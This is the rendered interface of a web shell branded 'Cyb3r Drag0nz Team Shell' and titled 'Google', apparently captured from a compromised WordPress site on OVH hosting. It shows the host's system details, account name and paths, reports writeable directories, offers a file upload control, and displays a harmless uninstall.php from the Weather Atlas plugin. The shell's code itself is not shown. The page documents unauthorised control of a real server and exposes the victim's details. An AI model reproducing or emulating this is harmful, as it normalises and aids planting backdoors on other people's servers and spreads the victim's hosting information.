Google

Cyb3r Drag0nz Team Shell

Server : Apache
System : Linux webd003.cluster126.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User : atwiofrxug (73666)
PHP Version : 8.4.10
Disable Functions : _dyuweyrj4,_dyuweyrj4r,dl
Current Directory : /home/atwiofrxug/mylittletelaviv/wp-content/plugins/weather-atlas/
Directory Status: Writeable | Document Root: Writeable

Upload File







Viewing: /home/atwiofrxug/mylittletelaviv/wp-content/plugins/weather-atlas/uninstall.php

<?php
	
	/**
	 * Fired when the plugin is uninstalled.
	 * When populating this file, consider the following flow
	 * of control:
	 * - This method should be static
	 * - Check if the $_REQUEST content actually is the plugin name
	 * - Run an admin referrer check to make sure it goes through authentication
	 * - Verify the output of $_GET makes sense
	 * - Repeat with other user roles. Best directly by using the links/query string parameters.
	 * - Repeat things for multisite. Once for a single site in the network, once sitewide.
	 *
	 * @link       https://www.weather-atlas.com
	 * @package    Weather_Atlas
	 */
	
	// If uninstall not called from WordPress, then exit.
	if ( ! defined( 'WP_UNINSTALL_PLUGIN' ) )
	{
		exit;
	} 

Cyb3r Drag0nz Team • Google Edition